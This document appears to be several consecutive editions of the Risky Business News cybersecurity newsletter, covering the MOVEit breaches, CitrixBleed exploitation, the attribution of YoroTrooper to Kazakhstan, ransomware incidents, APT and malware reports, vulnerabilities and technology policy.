MOVEit victim count passes 2.5K: The number of companies impacted by Clop's MOVEit hacking spree has formally surpassed 2,500, according to security firm Emsisoft. The latest organizations to be added to this list are Avast's CCleaner app and the US Justice and Defense departments. The US DOJ and DoD incidents are not as bad as they look, though, as officials say the hackers only gained access to the email addresses of 632,000 US federal employees and nothing more.
Major ransomware incident in Germany: A suspected ransomware attack on a German IT company has crippled local government systems across western Germany. According to German officials, the attack hit a company named Südwestfalen IT. The number of affected municipalities is unknown, but most are small towns located in Germany's North Rhine-Westphalia region. [Additional coverage in BILD]
NSPK hack: A hacking group named DumpForums claims to have breached the Russian National Payment Card System, a division of Russia's Central Bank and the operator of MIR payment cards. The group claims it gained access to customers' personal data and the NSPK's internal projects. The organization denied any hack and said that only its website was impacted. The DumpForums group has a history of targeting Russian organizations and dumping their data. [Additional coverage in RBC]
British Library incident: A cyber-attack has knocked out the IT network of the British Library for almost five days. The incident has impacted book orders and manual collections.
General tech and privacy
Microsoft cracks down on Xbox cheating: Microsoft will start blocking unauthorized Xbox controllers and accessories starting on November 12, 2023. The block will impact every Xbox owner who uses a third-party controller that did not obtain a Microsoft license for its product. The move will also have a huge impact on the game cheating scene and will likely spell the end for cheating devices such as XIM and Cronus Zen. [Additional coverage in Xfire]
Meta introduces paid tier in the EU: Social media company Meta is introducing a paid subscription for European users that will remove ads from its Facebook and Instagram services. The tier will cost €9.99/month on the web or €12.99/month for mobile users. Meta says it is introducing the new tier in response to the EU's GDPR regulation. The company says that by making users choose between the free and paid subscription, users are effectively making a conscious choice to have their personal information used for ad targeting.
Samsung Auto Blocker: Samsung has launched a new security feature for its latest line of smartphones. Named Auto Blocker, the feature prevents users from installing apps downloaded from outside the Samsung Galaxy and Google Play stores. The new feature can also block app side-loading operations from both the user interface and via automated commands sent via a USB debugging port. The feature is available for all Samsung phones running the One UI 6 home screen software.
Government, politics, and policy
Spyware alerts in India: Apple has notified over a half dozen lawmakers from India's main opposition parties that their iPhones have been targeted by state-sponsored attacks. Victims included figures from India's main opposition parties, such as the National Congress, AIMIM, the AAP, and the Communist Party. The alleged hacking attempts took place weeks before Indians are set to elect members to its new Parliament. In a pressconference, Rahul Gandhi, leader of the National Congress Party and Modi's main rival for the upcoming elections, accused the Indian government of the attempted hacks. Besides politicians, two Indian journalists and a member of an NGO also received notifications from Apple. [Additional coverage in TechCrunch]
Russia is developing a multiscanner: Russia's Minister of Digital Development says it is working on developing a multi-scanner solution for Russia's internal market. The project is named the "National Multiscanner," is modeled after Google's VirusTotal service, and is expected to enter testing this year. Officials say the service will operate at full capacity in 2025. [Additional coverage in the Rossiyskaya Gazeta]
Canada bans WeChat/Kaspersky: The Canadian government has banned the use of WeChat and Kaspersky applications on government-issued mobile devices. Officials say the apps present an "unacceptable level of risk to privacy and security" for government workers. Canadian officials stopped short of calling the apps espionage tools. The ban has entered into effect this week on October 30.
CRI pledge: Officials from 48 countries attending the third edition of the International Counter Ransomware Initiative (CRI) are expected to sign a pledge to not pay ransoms demanded by ransomware gangs. This year's meeting is focused on improving information-sharing mechanisms surrounding ransomware attacks. To help get things moving, a White House official says the CRI plans to publish a list of cryptocurrency wallets associated with ransomware operations that can be tracked and blacklisted across member states. [Additional coverage in CyberScoop]
US Facial Recognition Act: House Democrats have introduced a bill named the Facial Recognition Act that would require law enforcement agencies to obtain a warrant before using facial recognition technology to identify a suspect.
WH AI EO: The Biden Administration signed an executive order that sets a national strategy and introduces new rules and standards for the development of artificial intelligence (AI) technologies. The executive order covers a lot of areas:
Companies developing AI models that have national security, economic, or health risks will have to notify the US government of their efforts and safety tests.
The executive order calls on Congress to pass legislation to protect Americans' privacy from AI technologies and laws to prevent AI from being used to discriminate against certain groups.
Orders NIST to develop AI safety standards.
Orders the DHS to investigate potential (ab)uses of AI and protect US critical systems from those threats (such as AI used for weapons of mass destruction, IP theft, cybersecurity, etc.).
Orders the DHS to use AI tooling in its daily operations, such as threat detection, prevention, and vulnerability assessments.
Orders AI-generated content to be labeled appropriately.
Besides the US, the G7 group also agreed on a Code of Conduct for AI companies, while the European Union is still working on AI legislation.
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, on the rise and evolution of vulnerability threat intel and how CISA KEV's new ransomware section will be a game changer.
Cybercrime and threat intel
Magniber members detained: South Korean authorities have detained five employees of a data recovery company on suspicion of working with North Korean hackers. Officials say the company collected more than 3.4 billion won ($2.5 million) in data recovery services from 778 companies hit by ransomware. South Korean police say the company conspired with North Korean hackers via email and Telegram and received a manual on how to recover encrypted systems. The company used targeted search keyword ads to advertise its services to impacted companies. While officials have not named the ransomware, several sources have told RiskyBusinessNews that the company was working with the Magniber gang, a ransomware strain that only targeted South Korean companies. According to South Korean security firm AhnLab, the Magniber crew has been inactive since August 25, representing the longest period of inactivity for the group since its launch in 2016. [Additional coverage in Chosun]
SIM swapper sentenced: A US judge has sentenced a 20-year-old Florida man to 30 months in prison for stealing almost $1 million from online cryptocurrency accounts using SIM swapping attacks.
DSA malvertising: Malwarebytes has discovered a novel malvertising campaign that abuses a Google feature named Dynamic Search Ads. Threat actors are abusing the feature for the bulk creation of malicious ads that automatically pull text from the pages they want to lure users to.
NuGet malware: ReversingLabs researchers have found a new wave of malicious packages uploaded on the NuGet portal. Researchers say the new packages appear to be connected to the campaign spotted by Phylum early last month. ReversingLabs believes the campaign has been going on since at least August this year and involved several hundred malicious packages.
Caffeine PhaaS: Cofense looks at the recent infrastructure used by the Caffeine Phishing-as-a-Service.
Prolific Puma: A new threat actor named Prolific Puma is running an on-demand URL-shortening service for malware gangs as part of a novel Cybercrime-as-a-Service offering. The primary purpose of the service is to provide shortened URLs that get blacklisted by security firms instead of a customer's actual infrastructure. Discovered by Infoblox, the service has been operating since at least January 2020 and has been primarily used in smishing operations.
Malware technical reports
EleKtra-Leak: A threat actor named EleKtra-Leak has been spotted scanning GitHub repositories for accidentally leaked AWS IAM tokens in order to gain access to AWS infrastructure and perform crypto-mining operations. Palo Alto Networks says this is one of the oldest crypto-mining operations known to date, going as far back as December 2020.
FakeUpdateRU: Sucuri researchers have looked at a malware distribution campaign named FakeUpdateRU that used compromised websites to distribute a fake update for the Chrome browser that infected user systems with RATs.
IcedID: Proofpoint looks at recent TA471 campaigns distributing a forked version of the IcedID malware. The two campaigns were extremely small and ran for only a week but contained a new IcedID version that Proofpoint described as "unique."
BiBi-Linux wiper: A pro-Hamas hacktivist group is deploying a new Linux data wiper in attacks targeting Israeli organizations. The wiper works by overwriting almost all of a local system's files with random data. The malware has been named BiBi-Linux because it renames all destroyed files with a file extension that begins with BiBi, the nickname of Israel's prime minister, Benjamin Netanyahu.
Sponsor Demo
Nucleus Security's COO Scott Kuffer shows Risky Business podcast host Patrick Gray their vulnerability management platform. It ingests scan outputs from a number of vulnerability identification tools, normalizes that information, and then allows vulnerability management teams to do things like assign responsibility for certain types of bugs to the correct people.
APTs and cyber-espionage
Lazarus KANDYKORN: Elastic's security team has published a breakdown of KANDYKORN, a macOS malware strain used by North Korean hacking group Lazarus in attacks targeting blockchain engineers working for a cryptocurrency exchange platform.
"Attackers impersonated blockchain engineering community members on a public Discord frequented by members of this community. The attacker social-engineered their initial victim, convincing them to download and decompress a ZIP archive containing malicious code. The victim believed they were installing an arbitrage bot, a software tool capable of profiting from cryptocurrency rate differences between platforms."
Pensive Ursa: PAN's Unit42 looks at a new version of Kazuar, a malware typically used by the Pensive Ursa (aka Turla, Uroburos) APT.
"The Ukrainian CERT reported in July 2023 that this version of Kazuar was targeting the Ukrainian defense sector. The threat group behind this variant was going after sensitive assets such as those found in Signal messages, source control and cloud platforms data."
Blind Eagle: Qihoo 360 looks at another wave of Blind Eagle (APT-C-36) operations. The report covers the Latin American APT trying to use the Amadey malware for recent operations.
AridViper: Palestinian APT group AridViper has been seen disguising spyware inside updates to non-malicious Android applications. Published by Cisco Talos, the report covers campaigns that predate the recent Hamas-Israeli conflict, as the vendor was "performing the due diligence with law enforcement."
Scarred Manticore: Check Point has a report on Scarred Manticore, an Iranian cyber threat group linked to MOIS (Ministry of Intelligence & Security). The report covers campaigns targeting government, military, telecom, IT, finance, and NGOs in the Middle East. The report also focuses on LIONTAIL, the group's latest malware framework. The group is linked to the Iranian actor DEV-0861 and, to some degree to, OilRig.
"Scarred Manticore's playbook has evolved from basic web shell attacks on Windows Servers to an advanced framework with diverse and powerful toolset that utilizes both custom-written and open-source components. A clear sign of Iran's cyber game leveling up."
Vulnerabilities, security research, and bug bounty
New Atlassian bug: Software company Atlassian has released a security update for a vulnerability (CVE-2023-22518) in Confluence servers that can be used to wipe customer systems. The patch notes include a rare message from the company's chief information security officers, a sight you don't usually see in software updates. Atlassian CISO Bala Sathiamurthy urged companies to "take immediate action" and install the software update to avoid data loss scenarios. Sathiamurthy says the vulnerability is extremely dangerous because it can be exploited remotely by unauthenticated attackers. Atlassian says that all versions of Confluence Data Center and Server are affected but that no attacks have been observed in the wild so far—although the bug's data-wiping capabilities will most likely entice some threat actors.
Cisco IOS XE PoC: Security firm Horizon3 has published fully working PoCs for the recent Cisco IOS XE zero-days tracked as CVE-2023-20273 and CVE-2023-20198. According to Censys, around 29K Cisco systems remain infected with backdoors after a threat actor exploited these zero-days last month.
F5 BIG-IP PoC: Quite a few proof-of-concept exploits have been posted online for the latest F5 BIG-IP vulnerability tracked as CVE-2023-46747. F5 confirmed active exploitation shortly after they went live.
Wyze PoC drama: Security researcher Peter Geissler has published a proof-of-concept exploit for Wyze IP cameras. Geissler says he published the exploit because Wyze released security updates for the Wyze Cam v3 model days before the Pwn2Own 2023 Toronto hacking contest, where he was scheduled to use the exploit. Geissler claims Wyze did it on purpose and only patched the camera model used in the contest and did not release patches for other models. The Wyze Cam v3 was hacked by four other researchers, regardless.
Infosec industry
ATT&CK v14: MITRE has released v14 of the ATT&CK framework. This new update comes with updates to the Enterprise and Mobile, Assets in ICS, and Mobile Structured Detections sections.
Acquisition news: Palo Alto Networks says it plans to acquire cloud security provider Dig Security.
New tool—Cascade: Academics from ETH Zurich have released Cascade, a RISC-V CPU fuzzer.
New tool—USB security tokens: Software developer Steffen Vogel has put together a spreadsheet comparing all the major USB security tokens.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss what is really at stake when it comes to cyber security.
This newsletter is brought to you by vulnerability management and analysis platform Nucleus Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A Citrix vulnerability has entered the dangerous stage of mass exploitation as multiple threat actors are compromising unpatched devices all over the internet in a race with each other to steal their session tokens.
Known as CitrixBleed and tracked as CVE-2023-4966, the vulnerability impacts Citrix ADC and Citrix NetScaler, which are extremely complex networking devices used in large enterprise and government networks in multiple roles, such as gateways, proxies, caching, VPN servers, and a bunch of other stuff.
The vulnerability allows threat actors to send junk data to the Citrix OpenID component that will crash and leak a part of the device's memory. The bad part is that, in some cases, this memory may contain session tokens that attackers can collect and then bypass authentication and access the device. For a more technical explanation, check this write-up from Assetnote researchers.
Citrix released patches to fix the CitrixBleed memory leak earlier this month, on October 10.
The bug in itself is extremely bad as it is, but things took a turn for the worse a week later when Google Mandiant researchers came out to say they found evidence CitrixBleed had been exploited in the wild since late August—making the vulnerability one of this year's tens of actively exploited zero-days.
Mandiant said a threat actor was using the bug to gain access to Citrix gateways and then pivot to internal systems. The attacks were small in scale and targeted professional services, technology, and government organizations.
Things turned from bad to disastrous last week, around October 23-25, when several proof-of-concept exploits started popping up on GitHub and vulnerability portals.
Within a day, mass-exploitation was in full swing. At the time of writing, GreyNoise is tracking more than 120 IP addresses that are probing the internet and attempting to exploit CitrixBleed.
Some of the IPs are associated with initial access brokers, but at least a couple are associated with affiliates for the AlphV and BlackBasta ransomware groups, according to Chris Duggan, the Director of Cyber Threat Intelligence at KryptoKloud.
Security researcher Kevin Beaumont says that—just on Saturday, October 28—more than 20,000 Citrix ADC and NetScaler devices have had session tokens stolen.
Last week, Citrix seemed to have seen the disaster coming and published a blog post about the vulnerability, urging device owners to patch but also invalidate all their past session tokens so that even if they were swiped, they could not be abused in the future. Instructions on how to delete all past sessions are in the blog post.
Beaumont—which also has a write-up on this disaster—has also released a script to test if Citrix systems are vulnerable or still vulnerable after a patch.
The Shadowserver Foundation has also been following the attacks and how companies have been responding. Based on its internal data, the organization is still seeing almost 5,500 unpatched Citrix devices exposed on the internet.
Some numbers here look odd, depending on what each company sees, but we nor you should need extra arguments to be convinced to patch this as soon as possible. We've honestly lost track of all the bad Citrix bugs of the past, but every time this reached the stage of mass exploitation, loads of big orgs and government agencies—especially from the US and Germany—began to appear on ransomware leak sites.
We've all seen this movie before, and there's no happy ending. This is gonna haunt organizations for months, and I will not be surprised if collections of Citrix session tokens start appearing for sale on underground hacking forums in the next weeks or so.
Breaches, hacks, and security incidents
Stanford University breach: The University of Stanford is investigating a security breach at one of its departments. The university confirmed a breach after the Akira ransomware listed the organization on its leak site last week. (h/t DataBreaches.net)
Crimea DDoS attacks: Ukrainian hacktivist groups launched a series of massive DDoS attacks at the end of last week that have disrupted internet services across the occupied peninsula. The attacks targeted MirTelecom, Krymtelecom, and MirandaMedia and impacted both mobile and landline internet connections. Russian officials confirmed the attacks and subsequent downtime in a Telegram post.
Khashoggi lawsuit dismissed: A US judge has dismissed a lawsuit filed by the widow of murdered journalist Jamal Khashoggi against Israeli spyware maker NSO Group. Hanan Elatr sued NSO earlier this year in June after the company's Pegasus spyware was used to hack her and her husband's phones before his murder. The judge dismissed the case because the hacking accusations were not sufficiently connected to the state of Virginia, where the lawsuit was filed. [Additional coverage in the Washington Post/non-paywall]
LastPass hack thefts: The hackers who breached LastPass last year stole another $4.4 million worth of crypto-assets from 25 customers last week. The hackers are cracking stolen LastPass password vaults, recovering crypto-wallet seed phrases, and stealing money from user accounts. With the latest round of thefts, this brings the total to almost $40 million after they previously stole another $35 million from ~150 other users earlier this year.
Rosgosstrakh hack: A threat actor is selling the data of 730,000 customers of Rosgosstrakh, Russia's second-largest insurance company. The data contains documents such as bank statements, scanned identification documents, and life insurance contracts. According to a review of the stolen files, the documents go back as far as 2010. The hacked company is one of the first entities put on the US sanctions list after Russia's invasion of Ukraine in February 2022.
General tech and privacy
Plea for longer Win10 support: More than 20,000 members of the Public Interest Research Group have asked Microsoft to extend support for the Windows 10 operating system, which is scheduled to reach End-of-Life status in two years, in October 2025. The organization says that around 40% of the one billion devices that run Windows 10 can't be upgraded to Windows 11, and will create an unnecessary e-waste problem. Also known as PIRG, this is the same industry group that has recently convinced Google to extend the warranty and support for older Chromebooks, citing similar arguments.
Windows 11 DNR: A feature named Discovery of Network-designated Resolvers (DNR) has landed in Windows 11 insider builds. The feature allows Windows 11 systems to automatically discover encrypted DNS servers in their local network, such as DoH or DoT servers.
Mastodon update: Mastodon admins have shipped a new update that adds support for Lists, allowing users better control over their home tabs.
iMessage Contact Key Verification: Apple's security team has published a breakdown of how their new "iMessage Contact Key Verification" feature works. The feature is designed to show alerts inside encrypted iMessage conversations whenever a new device is added to a participant's account. The feature was recently added to dev builds for the company's three major operating systems.
"iMessage Contact Key Verification is available in the developer previews of iOS 17.2, macOS 14.2, and watchOS 10.2."
iOS Private WiFi Address bug: Apple users are advised to update to the latest version of iOS and iPadOS to fix a privacy feature that never worked. Named Private WiFi Address, the feature was added in 2020 and allows users to hide their MAC address on local WiFi networks. Two security researchers say the feature never actually worked, and users who enabled it have been leaking their MAC address for the past three years. [Additional coverage in ArsTechnica]
Government, politics, and policy
NCSC PDNS: The UK's NCSC has launched a secure DNS service named PDNS. The service is currently available for UK central and local government organizations, the NHS, emergency services, the Ministry of Defense, and schools.
UK Economic Crime and Corporate Transparency Bill: The UK Parliament has passed a new law last week that simplifies procedures for seizing crypto and fiat currency linked to money laundering and other fraudulent activities. Named the Economic Crime and Corporate Transparency Act, the law grants law enforcement the power to seize assets linked to criminal operations prior to obtaining a successful court conviction. The new law puts the UK on par with US law enforcement, allowing them to take a more proactive role in disrupting criminal operations.
CISA+HHS Toolkit: The US cybersecurity agency (CISA) and the country's health department (HHS) have released a joint cybersecurity toolkit for organizations in the healthcare sector.
NSA guidance: The NSA has published guidance [PDF] on how to evaluate commercially available embedded Field Programmable Gate Array (eFPGA) devices for security threats.
Defensive cyber exercises: Both the US and Australian militaries have held defensive cyber exercises this month.
Israel recruits spyware vendors in Hamas war: The Israeli government has allegedly hired two spyware companies to help track the location of hostages kidnapped by Hamas forces during the October 7 attack. The country's intelligence agency has asked NSO Group and Candiru to upgrade their spying capabilities in order to target the smartphones of kidnapped victims. According to a New York Times[non-paywall] report from earlier this month, Hamas members have used the smartphones of kidnapped Israelis to hijack online accounts and spread propaganda and threats of violence. More than 200 Israeli hostages are still captive in the Gaza Strip. [Additional coverage in Bloomberg/non-paywall]
Hamas Telegram ban: Instant messaging Telegram has blocked some Telegram accounts and channels that have been identified as belonging to Hamas members. [Additional coverage in CNN]
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, on the rise and evolution of vulnerability threat intel and how CISA KEV's new ransomware section will be a game changer.
Cybercrime and threat intel
RagnarLocker arrests: The two RagnarLocker suspects that were detained in Spain earlier this month were Alicante residents. Five suspects were detained in total, with the gang leader's being detained in Paris, France, and two other arrests in Latvia.
Kopeechka: Cybercrime groups are using a service named Kopeechka ("penny" in Russian) to create accounts in bulk on almost all of the internet's top platforms. Launched in 2019, the service allows threat actors to bypass CAPTCHA, email, and SMS verification systems and create thousands of accounts to be used for spam operations. Kopeechka supports all the main platforms, such as Facebook, Instagram, TikTok, Twitter, LinkedIn, Telegram, Discord, and Reddit. It can also target smaller platforms like Mastodon, Roblox, and Kick. Its API and scripting capabilities also allow threat actors to port its capabilities and target almost any online service.
New npm malware: Four malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Celebrity spam: Ryan Gosling, Emily Blunt, and Jennifer Lopez have been this year's Top 3 most (ab)used celebrity names in phishing and spam campaigns, per McAfee.
Armenian campaign: CyberHUB has published an analysis of a malware campaign targeting Armenian users.
Jarjets ransomware: Broadcom's Symantec has seen two new ransomware strains named Jarjets and CATAKA being used in the wild. Not that many details are available about them so far.
VM-based botnets: In its Q3 threat report, internet infrastructure company Cloudflare says that the new HTTP/2 Rapid Reset technique is allowing DDoS botnets to become more efficient when running from virtual machines hosted on cloud infrastructure rather than using compromised IoT devices. Cloudflare says it is seeing VM cloud botnets generate 5,000 times more DDoS power than classic IoT botnets.
Malware technical reports
AvosLocker: Zscaler researchers have published a retrospective on the AvosLocker ransomware, a RaaS platform that operated between July 2021 and May 2023. The retrospective comes after CISA and the FBI updated their security advisory on the gang. It's unclear if the group returned with new attacks.
GHOSTPULSE: Elastic's security team has discovered a loader named GHOSTPULSE that is currently being used in campaigns leveraging compromised websites, SEO techniques, and malvertising.
Remcos RAT: Embee researchers have looked at the downloader component of the Remcos RAT.
Mystic Stealer: Zscaler researchers have published a new deep dive into Mystic Stealer, an infostealer that launched earlier this year in April. Previous reports on this threat are also available via CyFirma, InQuest, OALABS, and Zscaler (its first analysis).
Sponsor Demo
Nucleus Security's COO Scott Kuffer shows Risky Business podcast host Patrick Gray their vulnerability management platform. It ingests scan outputs from a number of vulnerability identification tools, normalizes that information, and then allows vulnerability management teams to do things like assign responsibility for certain types of bugs to the correct people.
APTs and cyber-espionage
SideCopy: Pakistan-based APT group SideCopy has adopted the recent WinRAR zero-day (CVE-2023-38831) in operations targeting India's Defense Ministry.
DoubleAlienRat: Chinese security firm NSFOCUS has discovered a new APT group named DoubleAlienRat that is currently targeting Chinese organizations. The company says the group possesses a high level of technical skills and comprehensive hacking techniques. The group also focuses on stealth by actively covering its intrusions. NSFOCUS believes the group operates out of an Asian country and specializes in attacking China.
North Korean mobile op: South Korea's National Intelligence Service has put out a warning that North Korean hackers have used a clone of a popular South Korean shopping app to infect South Koreans with malware. [Additional coverage in Newsis]
Lazarus PyPI supply-chain attack: Security firm HAWKEYE says evidence is mounting to suggest that the Lazarus North Korean hacking group is behind the VMConnectcampaign that planted malicious packages on the PyPI portal. Per HAWKEYE, the number of malicious packages in this campaign has now reached 24.
Lazarus 2023 campaigns: The Lazarus North Korean cyber-espionage group has breached a software vendor on multiple occasions throughout 2023. Russian security firm Kaspersky has not named the vendor but said the campaign lasted from March to August 2023. The company says Lazarus operators sought to maintain access to the vendor's network and deploy malware to its customers as part of a software supply chain attack. The campaign is one of three major operations carried out by Lazarus this year where the final payload was the LPEClient malware. The other two targeted defense contractors and the cryptocurrency industry.
Vulnerabilities, security research, and bug bounty
HackerOne milestone: Bug bounty platform says it surpassed a major milestone last week when it went over the $300 million mark in bug bounties paid to security researchers.
Vulnerability intelligence sources: This week's sponsor, Nucleus Security, has taken a look at the top vulnerability intelligence sources and how they overlap with each other. More in Patrick Garrity's LinkedIn post here.
Mirth Connect vulnerability: Security firm Horizon3 has published a write-up on CVE-2023-43208, a remote code execution bug they found in Mirth Connect, an open-source healthcare data integration platform. The vulnerability is a patch bypass for an older RCE tracked as CVE-2023-37679. The bug was patched two weeks ago in v4.4.1. More than 2,200 such systems are currently connected to the internet.
Unpatched WP plugin bug: NinTechNet researchers warn about a major vulnerability in the Deeper Comments WordPress plugin that has not been patched and allows full website takeover.
XORtigate: BishopFox has published a technical write-up on a Fortinet bug known as XORtigate, or CVE-2023-27997.
Lenovo LPE: SpecterOps has published an analysis of CVE-2023–4632, a local privilege escalation bug in the Lenovo updater. Lenovo patched the bug earlier this month.
VMWare security update: Enterprise software giant VMWare has published two security advisories to fix two sets of issues in its vCenter Server and Tools applications. The worst of the two is the vCenter update, which fixes a 9.8/10-rated memory issue that can lead to remote code execution attacks (CVE-2023-34048). According to LeakIX, more than 1,100 VMWare vCenter servers are exposed online in a vulnerable configuration.
Major Ubiquiti vulnerability: Ubiquiti has released a security update last week to patch a major vulnerability in UniFi, a software backend for controlling the company's gateways, switches, and wireless access points. Tracked as CVE-2023-41721, the vulnerability allows threat actors to access device configuration data and has received a severity rating of 10/10. Ubiquiti devices that have "automatic updates" enabled have already been patched. Those that do not will need to be updated as soon as possible.
Infosec industry
Pwn2Own Toronto 2023: The 2023 edition of the Pwn2Own Toronto hacking contest has come to an end. The contest win went to Team Viettel from Vietnam, with 30 points and $180,000 in prize money. The Toronto (fall) edition of Pwn2Own focuses on hacking smartphones and IoT devices. Participants won more than $1 million in prize money for 58 successful exploits. Devices hacked at this year's edition included the Samsung Galaxy S23 and Xiami 13 phones, HP and Lexmark printers, Wyze cams, TP-Link routers, QNAP and Synology NAS devices, and others.
BSides Canberra videos: Talks from the BSides Canberra 2023 security conference, which took place at the end of September, are available on YouTube.
CISA re-releases LME: CISA has released a new version of Logging Made Easy, a toolkit that enhances log management on Windows devices. The tool was originally developed by the UK's NCSC agency in the late 2010s and retired in March this year. CISA picked up the tool and re-wrote it to cover recent Windows versions and logging capabilities. The tool is available for download via CISA's official GitHub account (here).
Tool update—Nuclei: The Nuclei vulnerability scanner has now reached v3.
New tool—HAR File Sanitizer: Cloudflare has open-sourced a tool named HAR File Sanitizer that can remove authentication cookie files from HTTP Archive (HAR) files produced by browsers and typically used for tech support requests. The company created the tool after its own cookies were stolen from inside a HAR file it sent to identity provider Okta.
New tool—Archive Pwn: Security firm Pentragrid has open-sourced a tool named Archive Pwn that can be used to create boobytrapped archive files, useful for testing vulnerabilities and exploits.
New tool—CVECrowd: A security researcher named Konstantin has launched a website named CVECrowd that shows what CVEs are currently popular and discussed on Mastodon.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss "spooky effects," aka when agencies play silly buggers with target computers.
This newsletter is brought to you by Resourcely, the company that can help you manage Terraform securely. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
In a blog post this week, researchers with Cisco Talos have formally linked a cyber-espionage group named YoroTrooper to Kazakhstan, making it the first official APT group operating out of the country.
First spotted in the wild in June 2022, the group has followed the pattern of most nascent cyber espionage programs, starting with run-of-the-mill commodity malware and slowly moving to custom capabilities in recent attacks.
Throughout the past year, the group has primarily targeted former Soviet states in what appears to be a classic intelligence collection operation meant to support Kazakhstan's state objectives.
Talos says the group has successfully compromised state-owned websites and accounts belonging to government officials in several CIS states. Past operations also targeted embassies and energy organizations in the same countries and even some EU agencies as well.
The group's attacks have been hard to pinpoint in Kazakhstan. Talos says YoroTrooper has purchased VPN accounts and configured exit nodes to make their attacks appear as coming out of Azerbaijan, a country known to have a similar cyber espionage program.
Researchers say that other clues also played a role in their attribution, such as the fact that the group rarely targets Kazakh entities—with the exception of an operation against the country's Anti-Corruption Agency.
Furthermore, the group appears to have what Talso calls a "defensive interest" in the country's state-owned email service—Mail.kz. Cisco researchers say the group often conducts security scans of the service but has never bothered attacking it or registering look-a-like domains.
In addition, Talos has also spotted the group heavily using the Kazakh language and converting from Bitcoin to Kazakh currency. When it needs to use other languages—such as Azerbaijani—the group uses public tools like Google Translate to translate the text to Russian, Kazakhstan's second language, and for which there is better support on Google Translate.
Unlike some Belarussian cyber-espionage groups that appear to work together with Russian APTs, this also does not seem to be the case for YoroTrooper. Both Cisco reports on the group suggest it has repeatedly targeted entities in Russia, so this might not be the case of a second Ghostwriter APT.
Breaches, hacks, and security incidents
Cuban mercenaries: Pro-Ukrainian hacking group Cyber Resistance has "intercepted" new evidence of Cuban mercenaries joining the Russian Army to fight in Ukraine. The group hacked a Russian military officer earlier this year to reveal how Cubans were being recruited and transported to Russia to fight in Ukraine.
TransForm attack: The IT networks of five hospitals across Ontario are down following a cyberattack on a joint IT provider. TransForm says the incident has taken down appointment systems and some provisioning systems.
Meta locks pro-Palestine accounts: Social media company Meta has locked several Facebook and Instagram accounts that were posting pro-Palestine content. The company told NBC News they locked the accounts after they spotted a possible security breach. Meta says it is working to contact the original account owner and restore access.
CCleaner joins MOVEit list: Avast's CCleaner app has joined the list of entities impacted by this year's MOVEit hacks.
General tech and privacy
Win11 SMB encryption: Current insider preview versions of Windows 11 now support SMB encryption for outbound connections.
Government, politics, and policy
US OAGs sue Meta: State attorneys general in 41states and the District of Columbia have filed a collective lawsuit against social media giant Meta. Officials say the company knowingly designed algorithms and features to addict children and teens to its Instagram and Facebook platforms. Officials point the finger at features like infinite scrolling, near-constant notifications, and autoplay videos that create a sense of FOMO and cause mental health issues for young teens. The lawsuit is the result of a multi-state probe the coalition began in 2021 that started in a handful of states and expanded nationwide.
ICE's GOST: 404 Media has a profile on Giant Oak Search Technology (GOST), a database system used by the ICE to find "derogatory" social media posts by people seeking entry into the US.
Online Safety Bill becomes law: The UK's Online Safety Bill has passed through the Parliament and has become an official UK law. Now known as the Online Safety Act, its provisions force tech companies to take responsibility for the content they host on their platforms. The Act gives the UK government the power to force internet companies to remove child sexual abuse material, online scams, anonymous trolls, deepfakes, and other content the government will deem illegal. Companies that fail to act on the UK government's requests face fines of up to £18 million ($22 million), or 10% of their global annual turnover. Tech executives could also face prison time under certain circumstances.
Poland to finally investigate Pegasus abuse: Poland's new ruling coalition plans to create a parliamentary commission to investigate the use of Pegasus spyware by the previous government. The commission will look at how the former ruling party PiS used Pegasus to spy on opposition members, journalists, and prosecutors. The European Union has called out Poland for its use of the spyware, but the former government has never taken any action in response. [Additional coverage in Reuters]
Moldova blocks 22 Russian sites: Moldova's intelligence service has blocked access to 22 Russian news sites for engaging in an "informational war." The biggest names on the list are sites linked to RT (formerly RussiaToday), Mir TV, and Vesti FM. ISPs have been ordered to block access to the sites. The country previously suspended six Russian-language TV stations in 2022 for promoting pro-Kremlin misinformation about Russia's invasion of Ukraine.
RuNet censorship: Russia's communications watchdog Roskomnadzor says it is now blocking access to 167 VPN services and more than 200 foreign email providers. According to a rare statement from the agency, the Roskomnadzor is also blocking access to more than 590,000 web pages but says that most are malicious, such as phishing and malware distribution sites. Besides a blocklist, the agency also runs a whitelist, which allegedly contains more than 17,000 IP addresses to which the agency's filtering rules are not applied. [Additional coverage in Interfax]
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Resourcely CEO Travis McPeak about the modern DevOps ecosystem, how giving developers tools with security baked in keeps everyone safe and happy, and how that's easier than expecting your software engineers to become cybersecurity experts overnight.
Cybercrime and threat intel
Arrests in Nigeria: Nigerian police's cybercrime unit has detained six suspects and dismantled a cybercrime recruitment and training hub active in the country's capital, Abuja. Officials say the group was involved in romance scams, BEC, and fraudulent investment schemes. Members also dabbled in hacking and trading social media accounts. Along with the arrests, Nigerian police urged landlords and building owners to report any similar hubs operating on their properties.
Fake PoC targets security researchers: Chinese security firm Shanshi has discovered a fake PoC for a GeoServer vulnerability (CVE-2023-25157) that was infected with the VenomRAT and used to lure and target security researchers.
Twitter malvertising: Sponsored ads from verified Twitter users are pushing online scams targeting the cryptocurrency community. Also known as another day ending with "y" on Twitter.
Octo Tempest: The hacking group behind recent breaches at Caesars and MGM casinos has used threats of physical violence and gun shootings to coerce some of their victims into handing over enterprise credentials. According to a recent Microsoft report, the threats are typically made against a company's tech support and help desk personnel. The Microsoft report is the first to officially confirm—screenshots included—that the group uses physical threats to gain initial access to victim networks. A Cyberscoop report has linked the group's members to an underground community named The Com, where members allegedly learned to SIM swap, arrange house swatting incidents, and commission real-life violence. The report also warns that the group has now expanded from simple extortion schemes to ransomware, having an active partnership with the AlphV operation. Microsoft tracks the group as Octo Tempest, but they are also known as 0ktapus, Scattered Spider, and UNC3944.
Malware technical reports
MOUSEHOLE: Dragos has published part two of a technical analysis of MOUSEHOLE, one of the five modules of PIPEDREAM, an ICS malware framework developed by the Chernovite group. See part one here.
